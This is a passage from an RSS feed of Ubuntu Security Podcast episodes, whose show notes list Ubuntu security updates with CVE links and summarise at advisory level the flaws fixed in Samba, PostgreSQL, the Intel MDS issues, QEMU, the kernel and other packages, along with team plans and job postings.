<li><a href="https://ubuntu.com/security/CVE-2019-9820">CVE-2019-9820</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9819">CVE-2019-9819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9817">CVE-2019-9817</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9814">CVE-2019-9814</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9800">CVE-2019-9800</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7317">CVE-2019-7317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11701">CVE-2019-11701</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11699">CVE-2019-11699</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11696">CVE-2019-11696</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11695">CVE-2019-11695</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11693">CVE-2019-11693</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11692">CVE-2019-11692</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11691">CVE-2019-11691</a></li>
</ul>
</li>
<li>Latest upstream Firefox release (67.0)</li>
<li>Includes fixes for various issues including:
<ul>
<li>DoS, spoofing of browser UI, tricking users into launching local
executables, XSS and RCE</li>
<li>Tricking users into installing a malicious add-on by disabling the UI prompt</li>
<li>History exposure via bookmark handling</li>
</ul>
</li>
</ul>
<h3 id="usn-3566-2-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3566-2/">USN-3566-2</a>] PHP vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-10712">CVE-2016-10712</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11362">CVE-2017-11362</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12933">CVE-2017-12933</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11036">CVE-2019-11036</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20783">CVE-2018-20783</a></li>
</ul>
</li>
<li>In February 2018, and March 2018, released updates for PHP5 in Trusty
fixing multiple CVEs - this update is a corresponding update which fixes
some new CVEs in both Precise ESM and Trusty ESM and some of the same
older CVEs in Precise ESM.</li>
</ul>
<h3 id="usn-3992-1-webkitgtk-plus-vulnerabilities">[<a href="https://usn.ubuntu.com/3992-1/">USN-3992-1</a>] WebKitGTK+ vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8615">CVE-2019-8615</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8607">CVE-2019-8607</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8595">CVE-2019-8595</a></li>
</ul>
</li>
<li>New upstream release (2.24.2) - like most WebKitGTK+ updates, contains
little information on the new vulnerabilities - so assume the worst -
DoS, XSS, RCE</li>
<li>Used by GNOME Shell for captive portal handling etc</li>
</ul>
<h3 id="usn-3993-1-usn-3993-2-curl-vulnerabilities">[<a href="https://usn.ubuntu.com/3993-1/">USN-3993-1</a>, <a href="https://usn.ubuntu.com/3993-2/">USN-3993-2</a>] curl vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic and Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5436">CVE-2019-5436</a></li>
</ul>
</li>
<li>TFTP receive heap-based buffer overflow</li>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5435">CVE-2019-5435</a></li>
</ul>
</li>
<li>Integer overflow for 32-bit arches when handling a very large URL (&gt;2GB)
via the libcurl API (curl_url_set())</li>
</ul>
<h3 id="usn-3957-2-mariadb-vulnerabilities">[<a href="https://usn.ubuntu.com/3957-2/">USN-3957-2</a>] MariaDB vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2627">CVE-2019-2627</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2614">CVE-2019-2614</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-30/">Episode 30</a> mentioned an update for MariaDB for the standard support
releases fixing 8 CVEs - 2 of those applied to MariaDB in Trusty ESM -
both where a privileged attacker can crash server</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="clarifications-to-documentation-regarding-latest-intel-mds-vulnerabilities">Clarifications to documentation regarding latest Intel MDS vulnerabilities</h3>
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown/TechFAQ">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown/TechFAQ</a></li>
<li>Updated to describe situation when doing virtualisation:
<ul>
<li>To enable guest to mitigate various speculative execution
vulnerabilities, need to ensure the guest CPU emulates the various CPU
features (such as pcid, ssbd etc).</li>
<li>Depends on workloads - if running untrusted code in guests or not etc.</li>
<li>Previously QEMU would define various CPU models such as Broadwell-IBRS
which would include support for this emulation. However, most of the
newer features ssbd, md_clear etc are not included in these CPU models.</li>
<li>So instead need to explicitly enable them - this can be done in a few ways:
<ul>
<li>Can just passthrough host CPU features directly - recommended
approach if NOT going to migrating guests across hosts (since if has
different features will cease to work)</li>
<li>Otherwise manually enable features directly as a subset of the
supported features from all the various hosts in your datacenter -
depending on whether using QEMU on the command-line or libvirt to
configure has different ways to specify this but same idea for both</li>
</ul>
</li>
</ul>
</li>
</ul>
<h4 id="security-team-plans-for-19-dot-10-development-cycle">Security Team plans for 19.10 development cycle</h4>
<ul>
<li>19.10 cycle roadmap meeting was held in Lyon a 2 weeks ago - each Ubuntu
team presented on the progress etc from the 19.04 cycle as well as their
plans for the 19.10 cycle</li>
<li>Security team highlights for 19.10:
<ul>
<li>Automate more parts of our processes around triage of code reviews,
reactive package updates etc</li>
<li>Review and incorporate KSPP recommendations for kernel hardening</li>
<li>GCC -fstack-clash-protection and -fcf-protection as default</li>
<li>Various snapd enhancements (daemon user, OpenGL support, audio
migration)</li>
<li>AppArmor features - prompting, more groundwork for fine-grained network
mediation</li>
</ul>
</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="security-certifications-engineer">Security Certifications Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1660658">https://boards.greenhouse.io/canonical/jobs/1660658</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E033.mp3" length="13391530" type="audio/mpeg" /><itunes:duration>13:56</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 32
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-32/</link>
          <pubDate>Mon, 20 May 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E032.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 32</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at updates to cover the latest Intel CPU vulnerabilities
  (MDS - aka RIDL, Fallout, ZombieLoad), plus other vulnerabilies in
  PostgreSQL, ISC DHCP, Samba and more, whilst special guest this week is
  Seth Arnold from the...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at updates to cover the latest Intel CPU vulnerabilities
  (MDS - aka RIDL, Fallout, ZombieLoad), plus other vulnerabilies in
  PostgreSQL, ISC DHCP, Samba and more, whilst special guest this week is
  Seth Arnold from the Ubuntu Security Team to talk Main Inclusion Review
  code audits.
  </itunes:summary>
        <description>  This week we look at updates to cover the latest Intel CPU vulnerabilities
  (MDS - aka RIDL, Fallout, ZombieLoad), plus other vulnerabilies in
  PostgreSQL, ISC DHCP, Samba and more, whilst special guest this week is
  Seth Arnold from the Ubuntu Security Team to talk Main Inclusion Review
  code audits.
  </description>
        <googleplay:description>  This week we look at updates to cover the latest Intel CPU vulnerabilities
  (MDS - aka RIDL, Fallout, ZombieLoad), plus other vulnerabilies in
  PostgreSQL, ISC DHCP, Samba and more, whilst special guest this week is
  Seth Arnold from the Ubuntu Security Team to talk Main Inclusion Review
  code audits.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at updates to cover the latest Intel CPU vulnerabilities
(MDS - aka RIDL, Fallout, ZombieLoad), plus other vulnerabilies in
PostgreSQL, ISC DHCP, Samba and more, whilst special guest this week is
Seth Arnold from the Ubuntu Security Team to talk Main Inclusion Review
code audits.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>37 unique CVEs addressed</p>
<h3 id="usn-3972-1-postgresql-vulnerabilities">[<a href="https://usn.ubuntu.com/3972-1/">USN-3972-1</a>] PostgreSQL vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10130">CVE-2019-10130</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10129">CVE-2019-10129</a></li>
</ul>
</li>
<li>Stores statistics for columns by sampling values from that column
<ul>
<li>Security policy allows to restrict users from viewing particular rows</li>
<li>But sampling would not take into account security policy</li>
<li>User could craft a leaky operator which would return the sampled data
and effectively bypass the security policy</li>
<li>Fixed to only allow non-leakproof operators to use sampled data when no
relevant row security policies in place</li>
</ul>
</li>
<li>Arbitrary server memory able to be read by executing a crafted INSERT
statement on a partitioned table (only affects PostgreSQL 11 so only
Disco)</li>
</ul>
<h3 id="usn-3973-1-dhcp-vulnerability">[<a href="https://usn.ubuntu.com/3973-1/">USN-3973-1</a>] DHCP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6470">CVE-2019-6470</a></li>
</ul>
</li>
<li>DHCP server could crash due to mismatch in BIND internal memory
management and DHCP server code</li>
<li>BIND in Bionic + Cosmic contained a change which zeroed out an internal
index to indicate it was unused - however 0 is still a valid index in the
DHCP server codebase - and so this could cause a use-after free (since
would be free&rsquo;d, index set to 0 by BIND lib but then still used later
since 0 is valid). Instead changed to track indexes correctly to account
for this behaviour.</li>
</ul>
<h3 id="usn-3974-1-vcftools-vulnerabilities">[<a href="https://usn.ubuntu.com/3974-1/">USN-3974-1</a>] VCFtools vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11130">CVE-2018-11130</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11129">CVE-2018-11129</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11099">CVE-2018-11099</a></li>
</ul>
</li>
<li>Tools for working with VCF files (1000 Genomes Project)</li>
<li>Fuzzed in conjunction with AddressSanitizer in clang using crafted VCF files
<ul>
<li>Read-based heap buffer overflow - crash, DoS</li>
<li>2 * use after free -&gt; crash, DoS / code execution</li>
</ul>
</li>
</ul>
<h3 id="usn-3975-1-openjdk-vulnerabilities">[<a href="https://usn.ubuntu.com/3975-1/">USN-3975-1</a>] OpenJDK vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2698">CVE-2019-2698</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2697">CVE-2019-2697</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2684">CVE-2019-2684</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2602">CVE-2019-2602</a></li>
</ul>
</li>
<li>2 affecting both openjdk-11 and openjdk-8
<ul>
<li>CPU DoS via BigDecimal implementation operating on particular values</li>
<li>Sandbox escape due to incorrect skeleton class selection in the RMI registry</li>
</ul>
</li>
<li>2 sandbox escapes affecting only openjdk-8 via the 2D graphics component</li>
</ul>
<h3 id="usn-3976-1-usn-3976-2-samba-vulnerability">[<a href="https://usn.ubuntu.com/3976-1/">USN-3976-1</a>, <a href="https://usn.ubuntu.com/3976-2/">USN-3976-2</a>] Samba vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16860">CVE-2018-16860</a></li>
</ul>
</li>
<li>Kerberos (as used in AD) contains an extension to allow a service to
request a Kerberos ticket to itself on behalf of a non-Kerberos
authenticated user (allows to use Kerberos for all internal code-paths)</li>
<li>Can be proxied over the network so that a privileged server can proxy on
behalf of the non-Kerberos authenticated user</li>
<li>This proxied request contains a checksum (which can be keyed to prevent
spoofing) - BUT this is not enforced - so an attacker can intercept the
proxied request and rewrite the user name to any other one in the KDC AND
replace the checksum with a simple CRC32 - as this can be computed
without any prior knowledge</li>
</ul>
<h3 id="usn-3986-1-wireshark-vulnerabilities">[<a href="https://usn.ubuntu.com/3986-1/">USN-3986-1</a>] Wireshark vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9214">CVE-2019-9214</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9209">CVE-2019-9209</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9208">CVE-2019-9208</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10903">CVE-2019-10903</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10901">CVE-2019-10901</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10899">CVE-2019-10899</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10896">CVE-2019-10896</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10895">CVE-2019-10895</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10894">CVE-2019-10894</a></li>
</ul>
</li>
<li>Updated to latest 2.6.8 release to fix many issues in various packet
dissectors that would cause wireshark to crash</li>
</ul>
<h3 id="usn-3988-1-mediainfo-vulnerabilities">[<a href="https://usn.ubuntu.com/3988-1/">USN-3988-1</a>] MediaInfo vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11373">CVE-2019-11373</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11372">CVE-2019-11372</a></li>
</ul>
</li>
<li>CLI tool for reading metadata from various audio/video files</li>
<li>2* OOB read -&gt; crash, DoS</li>
</ul>
<h3 id="lsn-0051-1-linux-kernel-vulnerability">[LSN-0051-1] Linux kernel vulnerability</h3>
<ul>
<li>4 CVEs for Microarchitectural Data Sampling (MDS) vulnerabilities
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
</ul>
</li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/MDS">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/MDS</a></li>
<li><a href="https://www.redhat.com/en/blog/understanding-mds-vulnerability-what-it-why-it-works-and-how-mitigate-it">https://www.redhat.com/en/blog/understanding-mds-vulnerability-what-it-why-it-works-and-how-mitigate-it</a></li>
<li><a href="https://www.redhat.com/en/blog/deeper-look-mds-vulnerability">https://www.redhat.com/en/blog/deeper-look-mds-vulnerability</a></li>
<li>Too invasive to be addressed by Livepatch - requires updates to the
kernel and new microcode to fix</li>
<li>Intel CPUs contain various microarchitectural elements - store buffers,
load ports, fill buffers - which get used to complete architectural
operations (read from an address etc)
<ul>
<li>4 CVEs due to the different use of these different buffers in the
various techniques</li>
<li>RIDL (Rogue in-flight data load) - fill buffers and load ports</li>
<li>Fallout - store buffers</li>
<li>ZombieLoad - independent discovery of fill-buffer variant of RIDL</li>
</ul>
</li>
<li>These get reused across operations, and in particular get reused across
hyperthreads executing on the same CPU core</li>
<li>A malicious process can use speculative execution sampling techniques to
infer the contents of one of these microarchitectural buffers - so could
see data from a process that had previously been executing on the same
CPU core OR in the case of HT can see data from a process executing
concurrently on the same core</li>
<li>In the case of a single core can be fixed by first adding new behaviour
to the unused VERW instruction to clear these buffers as a microcode
update</li>
<li>Then updating the Linux kernel to call this new VERW instruction when
switching tasks, VMs etc</li>
<li>However, does not mitigate in the case of SMT</li>
<li>So only way to properly mitigate is to disable SMT as well</li>
<li>In the case of virtualisation, the guest does the task switching so it
needs to clear these buffers - update to QEMU + libvirt to expose this
new CPU capability to the guest so that it can perform the flushing
itself</li>
<li>Kernel + QEMU updates also contain fixes for other CVEs</li>
<li>Kernels updated for all supported releases including the HWE kernels</li>
</ul>
<h3 id="usn-3977-1-intel-microcode-update">[<a href="https://usn.ubuntu.com/3977-1/">USN-3977-1</a>] Intel Microcode update</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3978-1-qemu-update">[<a href="https://usn.ubuntu.com/3978-1/">USN-3978-1</a>] QEMU update</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9824">CVE-2019-9824</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5008">CVE-2019-5008</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20815">CVE-2018-20815</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3979-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3979-1/">USN-3979-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9503">CVE-2019-9503</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9500">CVE-2019-9500</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3887">CVE-2019-3887</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3882">CVE-2019-3882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3874">CVE-2019-3874</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1999">CVE-2019-1999</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11683">CVE-2019-11683</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3980-1-usn-3980-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3980-1/">USN-3980-1</a>, <a href="https://usn.ubuntu.com/3980-2/">USN-3980-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Bionic (HWE), Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9503">CVE-2019-9503</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9500">CVE-2019-9500</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3887">CVE-2019-3887</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3882">CVE-2019-3882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3874">CVE-2019-3874</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16884">CVE-2018-16884</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3981-1-usn-3981-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3981-1/">USN-3981-1</a>, USN-3981-2] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (HWE), Xenial (HWE), Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9503">CVE-2019-9503</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9500">CVE-2019-9500</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3882">CVE-2019-3882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3874">CVE-2019-3874</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16884">CVE-2018-16884</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3982-1-usn-3982-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3982-1/">USN-3982-1</a>, <a href="https://usn.ubuntu.com/3982-2/">USN-3982-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (Xenial HWE), Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3882">CVE-2019-3882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3874">CVE-2019-3874</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3983-1-usn-3983-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3983-1/">USN-3983-1</a>, <a href="https://usn.ubuntu.com/3983-2/">USN-3983-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Precise ESM (Trusty HWE), Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3984-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3984-1/">USN-3984-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3985-1-usn-3985-2-libvirt-update">[<a href="https://usn.ubuntu.com/3985-1/">USN-3985-1</a>, <a href="https://usn.ubuntu.com/3985-2/">USN-3985-2</a>] libvirt update</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="main-inclusion-review-security-code-audits-discussion-with-seth-arnold">Main inclusion review security code audits discussion with Seth Arnold</h3>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="security-certifications-engineer">Security Certifications Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1660658">https://boards.greenhouse.io/canonical/jobs/1660658</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E032.mp3" length="23243580" type="audio/mpeg" /><itunes:duration>23:58</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 31
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-31/</link>
          <pubDate>Mon, 13 May 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E031.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 31</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we cover security fixes for GNOME Shell, FFmpeg, Sudo, Ghostscript and others, and we talk to Joe McManus about malicious Dockerhub images, Git repos being ransomed more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we cover security fixes for GNOME Shell, FFmpeg, Sudo, Ghostscript and others, and we talk to Joe McManus about malicious Dockerhub images, Git repos being ransomed more.</itunes:summary>
        <description>This week we cover security fixes for GNOME Shell, FFmpeg, Sudo, Ghostscript and others, and we talk to Joe McManus about malicious Dockerhub images, Git repos being ransomed more.</description>
        <googleplay:description>This week we cover security fixes for GNOME Shell, FFmpeg, Sudo, Ghostscript and others, and we talk to Joe McManus about malicious Dockerhub images, Git repos being ransomed more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security fixes for GNOME Shell, FFmpeg, Sudo, Ghostscript and others, and we talk to Joe McManus about malicious Dockerhub images, Git repos being ransomed more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>14 unique CVEs addressed</p>
<h3 id="usn-3966-1-gnome-shell-vulnerability">[<a href="https://usn.ubuntu.com/3966-1/">USN-3966-1</a>] GNOME Shell vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3820">CVE-2019-3820</a></li>
</ul>
</li>
<li>Local user could potentially bypass various restrictions of the lock
screen - menu items can be activated by keyboard combinations - these
could then be used to take screenshots (and fill up disk space), close
windows behind the lock screen or start the screen reader which could
read out the contents of windows behind the lock screen.</li>
<li>Fixed by disabling all menu items when the screen is locked</li>
</ul>
<h3 id="usn-3965-1-aria2-vulnerability">[<a href="https://usn.ubuntu.com/3965-1/">USN-3965-1</a>] aria2 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3500">CVE-2019-3500</a></li>
</ul>
</li>
<li>CLI download tool (akin to curl / wget but can also do bittorrent and others)</li>
<li>When logging would store credentials in log file which could be read by other users</li>
<li>Fixed by masking out credentials</li>
</ul>
<h3 id="usn-3967-1-ffmpeg-vulnerabilities">[<a href="https://usn.ubuntu.com/3967-1/">USN-3967-1</a>] FFmpeg vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9721">CVE-2019-9721</a></li>
